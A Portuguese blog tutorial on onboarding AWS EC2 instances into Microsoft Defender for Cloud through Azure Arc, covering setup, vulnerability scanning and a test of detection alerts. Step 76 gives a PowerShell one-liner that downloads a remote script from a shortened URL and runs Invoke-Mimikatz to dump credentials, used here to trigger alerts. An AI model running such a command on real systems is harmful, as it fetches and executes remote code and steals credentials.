Como proteger seus recursos da AWS utilizando o Microsoft Defender for Cloud

Agora você pode conectar contas AWS ao Microsoft Defender for Cloud, para obter uma visão multi-cloud unificada da postura de segurança da sua organização.

O Defender for Cloud aproveita o Azure Arc para simplificar o embarque e a segurança de máquinas virtuais em execução em AWS e outras nuvens. Isso inclui provisionamento automático de agentes, gerenciamento de políticas, gerenciamento de vulnerabilidades, EDR incorporado e muito mais.

O Microsoft Defender for Cloud protege as cargas de trabalho no Azure, Amazon Web Services (AWS) e Google Cloud Platform (GCP).

Funções e permissões necessárias para o conector AWS

Azure – É necessário a função de Owner da assinatura relevante do Azure. A função Contributor também pode conectar uma conta AWS se um proprietário fornecer os detalhes principais do serviço (necessário para o plano Defender para Servidores).

AWS –Para criar a pilha no AWS, você precisa das permissões apropriadas para criar IAM roles.

Pré-requisitos do conector AWS

Antes de habilitar o conector AWS no Azure, verifique se você tem os seguintes pré-requisitos em vigor:

  • Conta AWS

Para conectar uma conta AWS à sua assinatura do Azure, você precisará ter acesso a uma conta da AWS.

  • Microsoft Defender for servers ativado 

Já escrevi um artigo aqui no site mostrando como habilitar o Microsoft Defender for Cloud, clique no link abaixo para conferir.

Como habilitar o Microsoft Defender for Cloud – Jádson Alves (jadsonalves.com.br)

  • As instâncias EC2 exigem gerenciamento pelo AWS Systems Manager

Uma conta AWS ativa com instâncias EC2 gerenciadas pelo AWS Systems Manager (SSM) e usando o agente SSM. Algumas AMIs (Amazon Machine Images, imagens da máquina amazon) têm o agente SSM pré-instalado, suas AMIs estão listadas em AMIs com o SSM Agent pré-instalado.

Se as suas instâncias EC2 não tiverem o Agente SSM, siga as instruções relevantes da Amazon:
Instale o SSM Agent para um ambiente híbrido (Windows)
Instale o SSM Agent para um ambiente híbrido (Linux)

Configuração do AWS Systems Manager

01 – Faça login no AWS Management Console.

Amazon Web Services Sign-In

02 – No AWS Management Console selecione a máquina virtual que deseja, clique em Actions, Security e selecione Modify IAM role.

03 – Na tela Modify IAM role, clique em Create new IAM role.

04 – Na tela Roles clique em Create role.

05 – Na tela Select trusted entity deixe selecionado AWS service, em Common use cases selecione EC2, em seguida clique em Next.

06 – Na tela Add permissions pesquise por AmazonSSMManagedInstanceCore, em seguida selecione AmazonSSMManagedInstanceCore e clique em Next.

07 – Na tela Name, review, and create em Role name digite um nome, em seguida clique em Create role.

08 – Como podemos observar a Role foi criada.

09 – De volta a tela Modify IAM role clique em Refresh, selecione a role AmazonSSMManagedInstanceCore e clique em Save.

10 – Na tela Instances selecione a máquina virtual que deseja, em seguida clique em Security, em IAM Role percebam que temos a role atribuída a máquina virtual.

11 – No Console Home selecione o nome do usuário e copie o Account ID.

Configuração Azure

12 – Faça login no portal do Azure.

https://portal.azure.com/

13 – No portal pesquise por Microsoft Defender for Cloud.

14 – Na tela Microsoft Defender for Cloud | Overview em Management clique em Environment settings.

15 – Na tela Microsoft Defender for Cloud | Environment settings expanda azure, Tenant Root Group, em seguida selecione a assinatura que deseja.

16 – Na tela Settings | Defender plans caso seu plano seja o basic selecione o plano Standard e clique em Save.

17 – Ainda na tela Settings | Defender plans selecione quais recursos deseja proteger com o Defender for Cloud, caso deseje desabilitar a proteção de algum recursos em Status selecione Off e clique em save.

18 – Ainda na tela Settings | Defender plans selecione Containers e clique em Edit configuration.

19 – Para a opção Advanced configuration em Azure Arc enable Kubernetes service AKS clusters (preview) selecione On, em seguida clique em Save.

20 – Ainda na tela Settings | Defender plans clique em Auto provisioning.

21 – Na tela Settings | Auto provisioning habilite a extensão Log Analytics agent for Azure Arc Machines (preview), na tela Extension deployment configuration em Chose a Log Analytics workspace selecione o log analytics workspace que deseja adicionar as máquinas virtuais do Azure Arc e clique em Appy.

22 – Ainda na tela Settings | Auto provisioning habilite a extensão Vulnerability assessment for machines, em seguida clique em Edit configuration.

23 – Na tela Extension deployment configuration podemos utilizar a solução de análise de vulnerabilidade da Microsoft ou Qualys, selecione a solução que deseja e clique em Apply.

24 – Ainda na tela Settings | Auto provisioning clique em Integrations.

25 – Na tela Settings | Integrations certifique que a opção Allow Microsoft Defender for Endpoint to access my data esteja habilitada, com essa opção habilitada temos a proteção de EDR para as máquinas virtuais.

26 – Na tela Microsoft Defender for Cloud | Overview em Management clique em Environment settings.

27 – Na tela Microsoft Defender for Cloud | Environment settings clique em + Add environment e selecione Amazon Web Services.

28 – Na tela Add account para a opção Account details em Connector name digite um nome para a conexão entre Microsoft Defender for Cloud e AWS, para a opção Onboard selecione Single account, em Subscription selecione a assinatura e grupo de recursos, em Location selecione a região que deseja e para a opção AWS account Id digite o Account ID, em seguida clique em Next: Select plans.

29 – Na tela Select plans temos as opções Security posture managemnt, servers, Databases e Containers, a opção Security posture management está habilitada por padrão e não podemos desabilitar, observe que o preço está Free (preview), para a opção Servers em Plan status deixe selecionado On em Auto-provisioning enabled clique em Configure.

30 – A tela Auto-provisioning configuration percebam que o Azure Arc já está habilitado, expanda Additional extensions for Arc connected machines (preview) , deixe habilitado o Microsoft Defender for Endpoint extension em Vulnerability assessment selecione Microsoft Defender for Cloud integrated Qualys scanner em seguida clique em Save.

31 – Na tela Select plans clique em Next: Configuration access.

32 – Na tela Configure access clique em Click to download the CloudFormation template.

33 – Na tela Configure access copie o secret, vamos precisar dessa informação no AWS Managemente Console, em seguida clique em Go to AWS.

Configuração AWS

34 – Após clicarmos em Go to AWS no Azure somos direcionados para tela create stack, deixe a opção Template is ready selecionado em Specify template selecione Upload template file em seguida clique Choose file, selecione o CloudFormation template que baixamos no Microsoft Defender for Cloud, em seguida clique em Next.

35 – Na tela Specify stack details em Stack name digite um nome “MicrosoftDefenderforCloud”, em ArcAutoProvisioningServicePrincipalSecret cole o secret que copiamos do Microsoft Defender for Cloud, em seguida clique em Next.

36 – Na tela Configure stack options clique em Next.

37 – Na tela Review MicrosoftDefenderforCloud marque I acknowledge that AWS CloudFormation might create IAM resources with custom names, em seguida clique em Create stack.

38 – Como podemos observar o recurso está sendo provisionado.

39 – Como podemos observar o recursos foi provisionado.

40 – De volta a tela Add account no Microsoft Defender for Cloud clique em Next: Review and generate.

41 – Na tela Review and generate clique em Create.

42 – Após criar o recurso somos direcionados para a tela Microsoft Defender for Cloud | Environment settings, podemos observar que foi criado o conector em AWS e Microsoft Defender for Cloud, clique em clique em 434720325357 (awsconnector).

43 – Na tela Settings | Defender plans temos os recursos que podem ser protegidos na AWS, clique em Standards.

44 – Na tela Settings | Standards temos os padrões de segurança contêm conjuntos abrangentes de recomendações de segurança para ajudar a proteger seus ambientes de nuvem.

Verificando integração da AWS com o Microsoft Defender for Cloud

45 – Faça login no portal do Azure.

https://portal.azure.com/

46 – No portal do Azure pesquise por Azure Arc.

47 – Na tela Azure Arc em Infrastructure clique em Servers.

48 – Na tela Azure Arc | Servers temos a instância da AWS i-081e332e55521bf34 com o status de Connect, clique em i-081e332e55521bf34.

49 – Após selecionar a máquina virtual em Overview temos algumas informações relacionadas a instancia da AWS, em Settings clique em Extensions.

50 – Na tela i-081e332e55521bf34 | Extensions percebam que temos as extensões MDE.Windows e MicrosoftMonitoringAgent, isso quer dizer que a integração do Microsoft Defender for Cloud com a AWS está funcionando.

MDE.Windows – Utilizado para o EDR

MicrosoftMonitoringAgent – Agente do Log Analytics Workspace.

51 – Faça login na instância Windows da AWS, clique em painel de controle e selecione Microsoft Monitoring Agente.

52 – Em Microsoft Monitoring Agent Properties clique em Azure Log Analytics, percebam que a máquina está associada ao Log Analytics workspace “Workspace-Defender” que configuramos em Auto provisioning na extensão Log Analytics agent for Azure Arc Machines (preview) no Microsoft Defender for Cloud.

53 – No portal do Azure pesquise por Microsoft Defender for Cloud.

54 – Na tela Microsoft Defender for Cloud | Overview percebam que temos uma AWS accounts em Security posture agora temos a porcentagem da postura de segurança do ambiente AWS, em General clique em Inventory.

55 – Na tela Microsoft Defender for Cloud | Inventory temos os recursos do Azure e AWS.

56 – Ainda na tela Microsoft Defender for Cloud | Inventory temos nossa instância da AWS associada ao Azure Arc.

Habilitando Vulnerability assessment

O Defender for cloud verifica regularmente seus computadores conectados para garantir que eles estejam executando ferramentas de avaliação de vulnerabilidade.

Já escrevi um artigo aqui no site falando sobre Microsoft Defender for Cloud – Vulnerability assessment, clique no link abaixo para conferir.

You searched for vulne – Jádson Alves (jadsonalves.com.br)

57 – No Microsoft Defender for Cloud | Overview clique em Recommendations.

58 – Na tela Microsoft Defender for Cloud | Overview expanda Remediate vulnerabilities e clique em Machines should have a vulnerability assessment solution.

59 – Na tela Machines should have a vulnerability assessment solution em Affected resources, na opção Unhealthy resources selecione a máquina virtual i-081e332e55521bf34, em seguida clique em Fix.

60 – Na tela A vulnerability assessment solution should be enabled on your virtual machines podemos habilitar a analise de vulnerabilidades do Microsoft Defender for Endpoint e também podemos utilizar o Qualys, selecione Deploy the integrated vulnerability scanner powered by Qualys (included with Microsoft Defender for servers) e clique em Proceed.

61 – Na tela Fixing resources clique em Fix 1 resource.

62 – De volta a tela Machines should have a vulnerability assessment solution aguarde até a remediação finalizar, após finalizar a máquina virtual será movida para Healthy resources.

63 – Após alguns minutos a máquina virtual agora faz parte de Healthy resources.

64 – Na máquina virtual da AWS no painel de control em Programs and Features, podemos observar que o Qualys Cloud Security Agent está instalado.

65 – Na máquina virtual da AWS em Task Manager podemos observar que o Qualys Cloud Agent está em execução.

Recommendations

66 – Na tela Microsoft Defender for Cloud | Recommendations temos todas as recomendações para melhorar a postura dos ambientes Azure e AWS, também podemos ver as recomendações para cada ambiente de forma individual.

Security posture

67 – Na tela Microsoft Defender for Cloud | Overview em Cloud Security clique em Security posture.

68 – Na tela Microsoft Defender for Cloud | Security posture percebam que temos a porcentagem da postura de segurança dos ambientes da Azure e AWS, também é possível visualizar a postura de cada ambiente de forma individual, em View recommentations podemos verificar todos as recomendações de segurança dos ambientes.

Regulatory compliance

69 – Na tela Microsoft Defender for Cloud | Regulatory compliance podemos visualizar todos as normas de compliance dos ambientes da Azure e AWS.

Gerando incidentes de segurança nas instancias da AWS

Vulnerability assessment

70 – Para gerar alertas de vulnerabilidades em nosso ambiente instalei o Mozila Firefox 13.0 na instancia da AWS.

71 – No portal do Azure em Microsoft Defender for Cloud clique em Recommendations.

72 – Na tela Microsoft Defender for Cloud | Recommendations expanda Remediate vulnerabilities, em seguida clique em Machines should have vulnerability findings resolved.

73 – Na tela Machines should have vulnerability findings resolved em Affected resources podemos visualizar os recursos que estão vulneraveis e quais são as vulnerabilidades do recurso.

74 – Ainda na tela Machines should have vulnerability findings resolved em Affected resources selecione a máquina virtual i-081e332e55521bf34.

75 – Após selecionar a máquina virtual i-081e332e55521bf34 podemos visualizar o total de vulnerabilidades da máquina virtual, o total de vulnerabilidade por gravidade e a lista com todas as vulnerabilidades.

Endpoint Detection and Response (EDR)

Já escrevi um artigo aqui no site falando sobre Microsoft Defender for Cloud – Endpoint Detection and Responde (EDR), clique no link abaixo para conferir.

You searched for edr – Jádson Alves (jadsonalves.com.br)

76 – Na instancia da AWS vamos simular um incidnte de segurança utilizando  o Mimikatz, no Windows Server abra o Command Prompt e execute o seguinte comando.

powershell “IEX (new-Object Net.Webclient).DownloadString(‘http://is.gd/oeoFuI’); Invoke-Mimikatz -DumpCreds”

Após executar o comando o Windows Security vai detectar como uma ameaça e fará o bloqueio.

77 – Abra o Windows Security clique em Virtus & threat protection, em Current threats, clique em Threat history, na tela Threat history clique em See full history, percebam que temos o Trojan:PowerShell/Mimikats.

78 – No portal do Azure pesquise por Microsoft Defender for Cloud, na tela Microsoft Defender for Cloud | Overview clique em Security alerts.

79 – Na tela Microsoft Defender for Cloud | Security alerts temos todos os alertas de segurança do ambiente, percebam que temos os alertas Mimikatz credential theft tool e Suspicious use of PowerShell detected com gravidade alta para a máquina virtual “i-081e332e55521bf34”.

80 – Na tela do Microsoft Defender for Cloud clique em Inventory.

81 – Na tela Microsoft Defender for Cloud | Inventory selecione a máquina virtual “i-081e332e55521bf34”.

82 – Na tela Resource health no canto esquerdo percebam que temos as informações relacionadas a máquina virtual como instalação do Monitoring agent, total de recomendações de segurança, alertas ativos e informações do recurso. No canto direito temos as opções Recommendations, Alerts e Installed applications, clique em Alerts.

83 –  Em Alerts percebam que temos os dois alertas de segurança Mimikats credential theft tool e Suspicious use of PowerShell detected, clique em Mimikats credential theft tool.

84 – Após selecionar o alerta no canto esquerdo observe que temos algumas informações importantes como gravidade, status, descrição do alerta e recurso afetado.

85 –  No canto direito temos alert details e Take action, em Alert details temos informações importantes como categoria de ameaça, a ação que o antivírus tomou que nesse caso foi remover a ameaça, usuário que executou o vírus e o nome do arquivo infectado, temos também um link para verificar o alerta no Microsoft Defender for Endpoint.

86 – Abaixo temos Related entities onde podemos observar as informações, Account, File, File hash, Host e Malware.

87 -Ainda na tela do alerta Mimikatz credential theft tool clique em Take action.

88 – Em Take action temos as opções Mitigate the threat onde temos algumas etapas sugeridas pelo Microsoft Defender for Cloud para mitigar a ameaça, também temos a opção Prevent furure attacks com recomendações para prevenir ataques futuros. Com a opção Trigger automated responde podemos configurar uma resposta automática utilizando o Logic App, e também podemos suprimir os alertas semelhantes como a opção Supress similiar alerts.

89 – Também podemos descartar o alerta, que basicamente esconde o alerta do painel de alertas de segurança, clique em Active e selecione Dismissed. Não vamos realizar essa ação nesse momento.

Comente suas sugestões e observações! 

Forte abraço, obrigado e até o próximo post.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *